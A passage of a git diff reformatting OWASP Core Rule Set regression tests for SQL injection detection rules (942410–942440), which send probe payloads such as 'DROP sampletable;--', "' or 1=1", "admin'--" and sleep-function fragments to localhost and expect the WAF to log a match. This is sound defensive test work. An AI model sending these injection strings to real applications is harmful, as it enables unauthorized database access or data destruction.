text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ord(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 72 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "password?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 73 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "password/?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 74 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Password>$(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 75 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 76 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pi(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 77 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "PI(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 78 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pow(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 79 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "POW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 80 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "quarter. (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 81 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "rand(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 82 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Rand (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 83 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RAND(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 84 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "replace(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 85 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "REPLACE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 86 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "round (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 87 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "round(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 88 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "rtrim(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 89 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RTRIM(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 90 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sin (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 91 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SIN(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 92 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 93 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SLEEP (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 94 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 95 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=substr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 96 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 97 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=substring(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 98 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 99 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 100 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "time (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 101 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=time%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 102 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 103 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 104 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 105 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 106 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=updatexml%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 107 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 108 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 109 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 110 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 111 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 112 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 113 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 114 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 115 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=version%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 116 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 117 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 118 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index 576280e8a..ef14db340 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942420.yaml tests: - - test_title: 942420-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "942420" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: id "942420" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index cca5bfa0c..7446ef615 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942421.yaml tests: - - test_title: 942421-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "cookie=@@@@@@@@@@@@@" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942421" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "cookie=@@@@@@@@@@@@@" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "942421" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index aa1a717cd..53bc53f74 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942430.yaml tests: - - test_title: 942430-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(((((())))))&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942430" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(((((())))))&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942430" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index fb9b2e02a..fcf159aed 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942431.yaml tests: - - test_title: 942431-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-------------------&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942431" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-------------------&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942431" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index b30a904c8..be29ba911 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942432.yaml tests: - - test_title: 942432-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=;;dd foo bar" - version: HTTP/1.0 - output: - log_contains: id "942432" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=;;dd foo bar" + version: HTTP/1.0 + output: + log_contains: id "942432" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index 508f02823..ac44eecc4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml @@ -2,338 +2,316 @@ meta: author: "Christian S.J. Peron, Max Leske, azurit" description: None - enabled: true - name: 942440.yaml tests: - - test_title: 942440-1 + - test_id: 1 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=DROP%20sampletable%3b--" - version: HTTP/1.0 - output: - log_contains: id "942440" - - test_title: 942440-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log_contains: id "942440" + - test_id: 2 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1;%00" - output: - log_contains: id "942440" - - test_title: 942440-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1;%00" + output: + log_contains: id "942440" + - test_id: 3 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=OR 1# " - output: - log_contains: id "942440" - - test_title: 942440-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=OR 1# " + output: + log_contains: id "942440" + - test_id: 4 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=admin'--" - output: - log_contains: id "942440" - - test_title: 942440-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=admin'--" + output: + log_contains: id "942440" + - test_id: 5 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=DROP/*comment*/sampletable" - output: - log_contains: id "942440" - - test_title: 942440-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DROP/*comment*/sampletable" + output: + log_contains: id "942440" + - test_id: 6 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 